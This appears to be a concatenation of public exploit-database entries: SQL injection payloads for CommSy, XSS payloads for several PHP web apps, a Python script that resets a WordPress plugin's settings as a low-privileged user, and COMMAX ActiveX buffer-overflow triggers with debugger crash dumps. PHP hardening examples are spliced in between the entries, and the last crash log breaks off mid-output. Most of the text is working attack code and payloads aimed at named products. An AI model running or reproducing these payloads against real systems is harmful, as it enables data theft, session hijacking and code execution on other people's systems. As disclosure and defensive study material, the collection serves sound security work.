Title:
======
CommSy 8.6.5 - SQL injection

Researcher:
===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2019-11880

Timeline:
=========
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Sent details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure

Affected Products:
==================
CommSy <= 8.6.5

Vendor Homepage:
================
https://www.commsy.net

Details:
========
CommSy is a web-based community system, originally developed at the
University of Hamburg, Germany, to support learning/working communities.
We have discovered an unauthenticated SQL injection vulnerability in
CommSy <= 8.6.5 that makes it possible to read all database content. The
vulnerability exists in the HTTP GET parameter "cid".

Proof of Concept:
=================
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login

error-based:
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
COUNT(*),CONCAT(0x716a767871,(SELECT
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login

time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login

Fix:
====
According to the manufacturer, the version branch 8.6 is no longer
supported and the vulnerability will not be fixed. Customers should
update to the newest version 9.2.
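As an added illustration, not code from CommSy or from the advisory: the following PHP contrasts a lookup that splices "cid" into a quoted SQL literal, the pattern the proof-of-concept strings above break out of, with a handler that validates "cid" as an integer and binds it as a parameter. Table and column names are assumed, and the database is an in-memory SQLite instance so the script runs stand-alone.

```php
<?php
declare(strict_types=1);

// Added example, not CommSy's own code (the advisory does not show it).
// Contrasts a lookup that splices the "cid" request parameter into a quoted
// SQL literal with one that validates it as an integer and binds it. Table
// and column names are assumed. Uses an in-memory SQLite database through
// PDO so it runs stand-alone (needs the pdo_sqlite extension).

function setupDatabase(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE context (cid INTEGER PRIMARY KEY, title TEXT)');
    $db->exec("INSERT INTO context (cid, title) VALUES (101, 'Room 101'), (102, 'Room 102')");
    return $db;
}

// Vulnerable shape: the raw parameter ends up inside a quoted literal, so a
// quote character in the input closes the literal and everything after it is
// parsed as SQL. This is the pattern the advisory's PoC strings break out of.
function lookupUnsafe(PDO $db, string $cid): array
{
    $sql = "SELECT cid, title FROM context WHERE cid = '" . $cid . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened shape: a context id is an integer, so reject anything else before
// it reaches the database, then bind it so the driver never parses it as SQL.
function lookupSafe(PDO $db, string $cid): array
{
    $id = filter_var($cid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('cid must be a positive integer');
    }
    $stmt = $db->prepare('SELECT cid, title FROM context WHERE cid = :cid');
    $stmt->bindValue(':cid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = setupDatabase();

// Constructed inputs in the shape of the advisory's boolean-based PoC, one
// with a true injected condition and one with a false one. The advisory's
// strings break out of a double-quoted literal; a single quote is used here
// because SQLite treats "..." as an identifier, but the mechanism is the same.
$conditionTrue  = "101' AND 1=1-- x";
$conditionFalse = "101' AND 1=0-- x";

// The spliced query answers the injected condition: a different row count for
// each input is exactly the oracle that a boolean-based blind injection reads.
printf("unsafe, true condition : %d row(s)\n", count(lookupUnsafe($db, $conditionTrue)));
printf("unsafe, false condition: %d row(s)\n", count(lookupUnsafe($db, $conditionFalse)));

// The validated, parameterised lookup rejects both and still serves a real id.
foreach ([$conditionTrue, $conditionFalse] as $input) {
    try {
        lookupSafe($db, $input);
    } catch (InvalidArgumentException $e) {
        printf("safe: rejected %s (%s)\n", json_encode($input), $e->getMessage());
    }
}
printf("safe, cid=101          : %d row(s)\n", count(lookupSafe($db, '101')));
```

The integer check also covers the error-based and time-based variants above, since none of them survive FILTER_VALIDATE_INT; the prepared statement is the defence that holds even where a parameter legitimately is a string.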
            
source: https://www.securityfocus.com/bid/49296/info

Real Estate Script is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 

"/></a></><img src=1.gif onerror=alert(1)> 
            
# Exploit Title: POC-CVE-2023-3244
# Date: 9/12/2023
# Exploit Author: Diaa Hanna
# Software Link: [download link if available]
# Version: <= 1.2.0 comments-like-dislike
# Tested on: 1.1.6 comments-like-dislike
# CVE : CVE-2023-3244

#References
#https://nvd.nist.gov/vuln/detail/CVE-2023-3244


#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.
#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.
#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).

import requests 
import argparse
import sys
from colorama import Fore

parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ')
parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True)
parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True)
parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True)
parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False)
args=parser.parse_args()

#check if the domain ends with a '/' if not then add it
url=args.url
if url[-1] != '/':
    url+='/'



wp_login = f'{url}wp-login.php'
wp_admin = f'{url}wp-admin/'
username = args.username 
password = args.password 


session=requests.Session()
#logging in
session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In', 
        'redirect_to':wp_admin, 'testcookie':'1'  },verify=not (args.nossl))
#if failed to login
if len(session.cookies.get_dict()) == 2:
    print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again")
    sys.exit(1)

#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function 
#the restore_settings function does not check the sufficient privileges of a logged-in user 
#even a subscriber can use this POC
response = session.get(f"{wp_admin}admin-ajax.php?action=cld_settings_restore_action", verify=not args.nossl)

if response.text == "Settings restored successfully.Redirecting...":
    print(Fore.GREEN + "exploit executed successfully")
    print(Fore.YELLOW + "settings of the comments-like-dislike plugin should be defaulted on the server")
    sys.exit(0)
else:
    print(Fore.RED + "some error occurred; please read the source code of the PoC, it isn't that long anyway")
    sys.exit(1)
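As an added illustration, not the plugin's own code: a PHP sketch of how the AJAX handler registered for cld_settings_restore_action can fail closed, with the capability check the advisory says is missing placed before the nonce check. The option key, nonce action, default settings and the manage_options capability are assumptions for this example; it loads inside WordPress as part of a plugin file.

```php
<?php
declare(strict_types=1);

// Added example, not the Comments Like Dislike plugin's code. Shows a
// settings-restore AJAX handler that fails closed. Option key, nonce action
// and default settings are assumed. Loads as part of a WordPress plugin.

// Hypothetical option key and nonce action for this illustration.
const CLD_EXAMPLE_OPTION = 'cld_example_settings';
const CLD_EXAMPLE_NONCE  = 'cld_example_restore';

function cld_example_default_settings(): array
{
    return ['like_enabled' => true, 'dislike_enabled' => true, 'template' => 'default'];
}

// Vulnerable shape, matching the advisory's description: any logged-in user
// who can reach admin-ajax.php (a subscriber included) resets the settings,
// because nothing here asks who the caller is.
function cld_example_restore_settings_unchecked(): void
{
    update_option(CLD_EXAMPLE_OPTION, cld_example_default_settings());
    echo 'Settings restored successfully.Redirecting...';
    wp_die();
}

// Hardened shape. The capability check is the authorisation decision and
// comes first; the nonce only defends against CSRF and is not a substitute,
// which is why a nonce still reachable by subscribers (the partial 1.2.0 fix
// the advisory mentions) does not close the hole on its own.
function cld_example_restore_settings(): void
{
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Insufficient permissions.'], 403);
    }
    // Dies with a 403 if the "nonce" field is missing or stale.
    check_ajax_referer(CLD_EXAMPLE_NONCE, 'nonce');

    // A state change should not be triggered by a plain GET like the PoC's.
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        wp_send_json_error(['message' => 'POST required.'], 405);
    }

    update_option(CLD_EXAMPLE_OPTION, cld_example_default_settings());
    wp_send_json_success(['message' => 'Settings restored.']);
}

// Authenticated hook only; no wp_ajax_nopriv_ counterpart for an
// administrative, state-changing action.
add_action('wp_ajax_cld_settings_restore_action', 'cld_example_restore_settings');

// The admin page that renders the restore button mints the nonce there, so
// it is never handed to users who cannot see that page:
//   wp_nonce_field(CLD_EXAMPLE_NONCE, 'nonce');
```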
            
source: https://www.securityfocus.com/bid/54111/info

Commentics is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Commentics 2.0 is vulnerable; prior versions may also be affected. 

http://www.example.com/commentics/commentics/comments/[admin_path]/index.php?page=edit_page&id="><script>alert(1)</script><!--
            
# Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting
# Date: 2021-02-18
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html
# Software: : Comment System 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4


# Vulnerable Page: http://localhost/comment/index.php
# Vulnerable Input Field :

Your Name:  "><script>alert(document.cookie)</script>

Comment:    "><script>alert(document.cookie)</script>

# Payload used:

"><script>alert(document.cookie)</script>

# POC: Whenever we will go to the page (http://localhost/comment/index.php) where the script is injected, the stored script will be executed.
# You will see your Javascript code (XSS) executed.
            
# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow


Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: 2.1.4.5

Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.

Desc: The vulnerability is caused by a boundary error in the
processing of user input, which can be exploited to cause a buffer
overflow when a user passes an overly long string through several
functions. Successful exploitation could allow execution of
arbitrary code on the affected node.

Tested on: Microsoft Windows 10 Home (64bit) EN
           Microsoft Internet Explorer 20H2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5663
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php


02.08.2021

--


$ python
>>> "A"*1000 [ToTheClipboard]
>>>#Paste in ID or anywhere

(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64pNotifyDebugger+0x19918:
00007ff9`deb0b530 c644242001      mov     byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
0:038> g
(5220.5b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL - 
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa            rep stos byte ptr es:[edi]
0:038:x86> r
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa            rep stos byte ptr es:[edi]
0:038:x86> !exchain
0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
  CRT scope  0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
                func:   ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
Invalid exception stack at ffffffff
0:038:x86> kb
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
0:038:x86> d esp
0d78f920  0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b  ...........vx.~.
0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%.@...x. ...
0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
0:038:x86> d ebp
0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%.@...x. ...
0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
0d78f9a0  8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00  ................
0:038:x86> d esi
41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:038:x86> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ie_to_edge_bho.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Commax_WebViewer.OCX - 
GetUrlPageData2 (WinHttp) failed: 12002.

DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP: 
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa            rep stos byte ptr es:[edi]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 41414141
Attempt to write to address 41414141

FAULTING_THREAD:  00005b30

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  IEXPLORE.EXE

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  41414141

FOLLOWUP_IP: 
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa            rep stos byte ptr es:[edi]

WRITE_ADDRESS:  41414141 

WATSON_BKT_PROCSTAMP:  95286d96

WATSON_BKT_PROCVER:  11.0.19041.1

PROCESS_VER_PRODUCT:  Internet Explorer

WATSON_BKT_MODULE:  CNC_Ctrl.DLL

WATSON_BKT_MODSTAMP:  547ed821

WATSON_BKT_MODOFFSET:  1043bf

WATSON_BKT_MODVER:  1.7.0.2

MODULE_VER_PRODUCT:  CNC_Ctrl Module

BUILD_VERSION_STRING:  10.0.19041.1023 (WinBuild.160101.0800)

MODLIST_WITH_TSCHKSUM_HASH:  aadfa1c5bdd8f77b979f6a5b222994db450b715e

MODLIST_SHA1_HASH:  849cfdbdcb18d5749dc41f313fc544a643772db9

NTGLOBALFLAG:  0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  784

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  LAB17

ANALYSIS_SESSION_TIME:  08-12-2021 14:20:11.0116

ANALYSIS_VERSION: 10.0.16299.91 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  ENU

PROBLEM_CLASSES: 

    ID:     [0n301]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n274]
    Type:   [INVALID_POINTER_WRITE]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n152]
    Type:   [ZEROED_STACK]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [0x5220]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

LAST_CONTROL_TRANSFER:  from 0b405dea to 0b4d43bf

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7


THREAD_SHA1_HASH_MOD_FUNC:  e84e62df4095d241971250198ae18de0797cfdc7

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  2033316a7c1a92aaeab1ce97e013350953fef546

THREAD_SHA1_HASH_MOD:  6d850af928076b326edbcafdf6dd4f771aafbab5

FAULT_INSTR_CODE:  458baaf3

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  CNC_Ctrl!DllUnregisterServer+f5501

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: CNC_Ctrl

IMAGE_NAME:  CNC_Ctrl.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  547ed821

STACK_COMMAND:  ~38s ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  CNC_Ctrl.DLL

BUCKET_ID_IMAGE_STR:  CNC_Ctrl.DLL

FAILURE_MODULE_NAME:  CNC_Ctrl

BUCKET_ID_MODULE_STR:  CNC_Ctrl

FAILURE_FUNCTION_NAME:  DllUnregisterServer

BUCKET_ID_FUNCTION_STR:  DllUnregisterServer

BUCKET_ID_OFFSET:  f5501

BUCKET_ID_MODTIMEDATESTAMP:  547ed821

BUCKET_ID_MODCHECKSUM:  357a4b

BUCKET_ID_MODVER_STR:  1.7.0.2

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  CNC_Ctrl.DLL!DllUnregisterServer

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1

TARGET_TIME:  2021-08-12T12:21:50.000Z

OSBUILD:  19042

OSSERVICEPACK:  1023

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS Personal

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  160101.0800

BUILDLAB_STR:  WinBuild

BUILDOSVER_STR:  10.0.19041.1023

ANALYSIS_SESSION_ELAPSED_TIME:  1d869

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver

FAILURE_ID_HASH:  {5e1e375a-c411-e928-cd64-b7f6c07eea3b}

Followup:     MachineOwner
---------
            
# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow


Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: 1.7.0.2

Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX
DVR/NVR.

Desc: The vulnerability is caused by a boundary error in the
processing of user input, which can be exploited to cause a
heap-based buffer overflow when a user passes an overly long string
through several functions. Successful exploitation could allow
execution of arbitrary code on the affected node.

Tested on: Microsoft Windows 10 Home (64bit) EN
           Microsoft Internet Explorer 20H2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5664
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php


02.08.2021

--


<!-- functions: rtsp_forceconnect_login() and rtsp_connect_login() -->
<!-- parameters: user_id, user_pwd and rtsp_addr                   -->
<html>
<object classid='clsid:3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A' id='cel' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\CNC_CTRL.dll"
prototype  = "Function rtsp_forceconnect_login ( ByVal user_id As String ,  ByVal user_pwd As String ,  ByVal rtsp_addr As String ,  ByVal rtsp_port As Long ,  ByVal rtp_proto As Long ,  ByVal device As Long ,  ByVal islive As Long ,  ByVal ch As Long ) As Long"
memberName = "rtsp_forceconnect_login"
progid     = "CNC_CTRLLib.UMS_Ctrl"
argCount   = 8

arga=String(2510, "C")
argb=String(2510, "B")
argc=String(2510, "A")
argd=1
arge=1
argf=1
argg=1
argh=1

cel.rtsp_forceconnect_login arga ,argb ,argc ,argd ,arge ,argf ,argg ,argh 

</script>
</html>

==

(5b1c.59e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL - 
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000  and     dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> r
eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001
eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000  and     dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> !exchain
030feab4: 41414141
Invalid exception stack at 41414141
0:000:x86> d esp
030fcf10  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf20  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf30  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf40  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf50  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf60  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf70  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf80  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000:x86> d ebp
030fe33c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe34c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe35c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe36c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe37c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe38c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe39c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe3ac  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
0:000:x86> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

GetUrlPageData2 (WinHttp) failed: 12002.

DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP: 
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000    mov     dword ptr [ecx+12D4h],ebx

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 000012d4
Attempt to write to address 000012d4

FAULTING_THREAD:  000056a4

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  wscript.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  000012d4

FOLLOWUP_IP: 
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000    mov     dword ptr [ecx+12D4h],ebx

WRITE_ADDRESS:  000012d4 

WATSON_BKT_PROCSTAMP:  7159f3df

WATSON_BKT_PROCVER:  5.812.10240.16384

PROCESS_VER_PRODUCT:  Microsoft ® Windows Script Host

WATSON_BKT_MODULE:  CNC_Ctrl.DLL

WATSON_BKT_MODSTAMP:  547ed821

WATSON_BKT_MODOFFSET:  27da1

WATSON_BKT_MODVER:  1.7.0.2

MODULE_VER_PRODUCT:  CNC_Ctrl Module

BUILD_VERSION_STRING:  10.0.19041.1023 (WinBuild.160101.0800)

MODLIST_WITH_TSCHKSUM_HASH:  d459299c6b0ff5b482d41c6445b84a3447c0171e

MODLIST_SHA1_HASH:  18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1

NTGLOBALFLAG:  0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

